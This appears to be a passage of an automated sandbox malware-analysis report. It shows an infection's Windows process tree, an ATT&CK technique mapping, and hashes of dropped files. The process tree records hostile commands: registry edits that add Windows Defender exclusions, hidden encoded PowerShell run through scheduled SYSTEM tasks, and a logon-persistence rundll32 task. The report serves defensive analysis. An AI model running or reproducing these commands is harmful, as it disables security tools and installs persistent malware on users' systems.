                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5544
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:1876
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5180
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5896
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5400
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:3472
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:6140
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:2928
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /CREATE /TN "gPcWskWvv" /SC once /ST 02:56:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:4324
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /run /I /tn "gPcWskWvv"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:1172
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /DELETE /F /TN "gPcWskWvv"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:4384
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 02:03:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\VmuoXxa.exe\" XT /Sesite_idnpz 385118 /S" /V1 /F
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                            PID:5140
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:5588
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:4356
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:5080
                                                                                                                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:3300
                                                                                                                                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:5664
                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4372
                                                                                                                                                                                                                                    • C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\VmuoXxa.exe
                                                                                                                                                                                                                                      C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\VmuoXxa.exe XT /Sesite_idnpz 385118 /S
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:3628
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4676
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:2392
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:6064
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:5044
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:2400
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                              PID:6032
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\bLHXfa.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                      PID:5180

                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                  Execution

                                                                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                  T1543

                                                                                                                                                                                                                                                  Windows Service

                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                  T1543.003

                                                                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                  T1543

                                                                                                                                                                                                                                                  Windows Service

                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                  T1543.003

                                                                                                                                                                                                                                                  Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1548

                                                                                                                                                                                                                                                  Bypass User Account Control

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1548.002

                                                                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                                                  Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1548

                                                                                                                                                                                                                                                  Bypass User Account Control

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1548.002

                                                                                                                                                                                                                                                  Impair Defenses

                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                  T1562

                                                                                                                                                                                                                                                  Disable or Modify Tools

                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                  T1562.001

                                                                                                                                                                                                                                                  Disable or Modify System Firewall

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1562.004

                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                  Subvert Trust Controls

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1553

                                                                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1553.004

                                                                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                                                                  Unsecured Credentials

                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                  T1552

                                                                                                                                                                                                                                                  Credentials In Files

                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                  T1552.001

                                                                                                                                                                                                                                                  Credentials in Registry

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1552.002

                                                                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                  T1012

                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                  T1082

                                                                                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1120

                                                                                                                                                                                                                                                  Collection

                                                                                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                  T1005

                                                                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1102

                                                                                                                                                                                                                                                  Impact

                                                                                                                                                                                                                                                  Service Stop

                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                  T1489

                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameServerClient\GameServerClient.exe
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    2.5MB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    bf4360d76b38ed71a8ec2391f1985a5f

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    57d28dc8fd4ac052d0ae32ca22143e7b57733003

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    4ebec636d15203378e15cc11967d00cbd17e040db1fca85cf3c10bbf7451adaf

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    7b46bc87dc384d8227adf5b538861165fa9efa18e28f2de5c1a1bb1a3a9f6bef29b449706c4d8e637ae9805bb51c8548cb761facf82d1c273d3e3699ae727acd

                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    288KB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameServerClient\installg.bat
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    238B

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    b6b57c523f3733580d973f0f79d5c609

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    2cc30cfd66817274c84f71d46f60d9e578b7bf95

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    d8d718641bdf39cca1a5db7bb52d3c66d400a97bef3cafdd81cd7e711a51c570

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    d39440163592bc3b1cb7830f236a97d5819c10775e453637d5a04a981e9a336480c6b4701afdceba0d52dfe09413b7abe2ad58ff55b5057a26229f3ccdc3a7c7

                                                                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    5f8d813c7eb29913307dadbdfe59619a

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    2b6622aec0879659d730db4298f12b26b31adfde

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    0157475cfd9655ac8a187f19c2f46ead13d1491dd81eebddf0bc7202b801c66b

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    eed34e1d5175c77470b1d8da90f4f3cf15dd73fccd91484d9859e10c8cd7279516064efebc1d7eb905e05de690e71f4b026a7bee41838a771c1d0e68eb652f99

                                                                                                                                                                                                                                                  • C:\ProgramData\mozglue.dll
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    593KB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                                                                  • C:\ProgramData\nss3.dll
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    2KB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    1KB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    9be7d897f3f1957c37732cd7517a41bd

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    1ce402bc7199457adfdb3e3172777d00faf28221

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    d3b74bb8aea2a7ce7c0ad1e93167d0f4d7ad89501939f4157b9b2353479e6c61

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    ce90d64d879ac990e9243aaf9cab104ccb1f1074509efce3d8540026c9682f2fe2bcdb6a6cd32e15b9a34125ea0b33196a77dc0c2c679b9342e7df9c7a080f30

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240329311\additional_file0.tmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    2.5MB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    15d8c8f36cef095a67d156969ecdb896

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    a1435deb5866cd341c09e56b65cdda33620fcc95

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240329311\opera_package
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    103.9MB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    4936231c48634b100429f03ad2da9441

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    ad9d994173ceaf384ce808b12f7d10563ecd8a1d

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    c5b7fcc93b1ed8b24f3c7be9d736401f2ac8c5fcaa270092a58d735f5630f3a7

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    45c86456b42c64524729a2ad3f2b058eafff733200f376e7e346a84bea9b0e55641dbdb22a7c79622bad1b993a4b7b26e741f6848b61f84382b4e3e464407a66

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    321KB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    1c7d0f34bb1d85b5d2c01367cc8f62ef

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    33aedadb5361f1646cffd68791d72ba5f1424114

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    2.7MB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    31841361be1f3dc6c2ce7756b490bf0f

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    ff2506641a401ac999f5870769f50b7326f7e4eb

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    460KB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    b22521fb370921bb5d69bf8deecce59e

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    3d4486b206e8aaac14a3cf201c5ac152a2a7d4ea

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    b30d10e292f89f4d288839974f71f6b703d6d9a9ae698ea172a2b64364e77158

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    1f7d64ba5266314ed18f577f0984706c21f4f48e8cdb069130e4435c2bcdf219f8dd27e4d3bf3a373f4db4c01e30efe8d7f4d87f4d8cbbbeaf9c7043f685994c

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    418KB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    0099a99f5ffb3c3ae78af0084136fab3

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    0205a065728a9ec1133e8a372b1e3864df776e8c

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    8510bcf5bc264c70180abe78298e4d5b

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    2c3a2a85d129b0d750ed146d1d4e4d6274623e28

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    158KB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    586f7fecacd49adab650fae36e2db994

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    35d9fb512a8161ce867812633f0a43b042f9a5e6

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    850KB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    021b6c96fe692e2bb8d4b0d02e9133b0

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    4ff05288024aef4f289c22e4e6985f82c29e49d5

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    ff477a862bd6e5acebe92887a6f221418da1995dfb0abed8527e21fda9b8950b

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    afc29e105225f8f92c74b8ead1df10bedbf6c795cad72c53a6ce6237b71d3f73e346cd6e0116c6a380f7d07e79fa5007e63df8dfe414d0c7816aaf5828cea482

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    2.4MB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    55f780ea4dc5a5401b80915d69a55481

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    5ebdde7f87637493de0a5e7a4ffcd59839672c4e

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    c3014a898f63fab694a759d56bb0b3c979484eedd32708e1467e566b4f3dfa70

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    680ca9d6f5aa4d53e7083858bfd4d3fc71f567993968edc83ddf262e15b2ed06f07c5a4c47e65f4874074213adf3cd978b8eaa658563694caf013fb126948697

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    1.8MB

                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                    963b56254d6c8875cf0652a7ab236a19

                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                    d5097cc9fcc9ca4fa15916a60e79219501b38c41

                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                    f00f2b00fc3b996c228cda8c90a30b6539421768c0ba874c3ad1b73af48354ce

                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                    a1ff8e164d53071fe332a284e5fafe3911c9f039d9e673d081e9a99522631cfe704094d4bf39d439937493e38e918f974a60f8995a96530ad7fc93b000bf0609

                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS7990.tmp\Install.exe
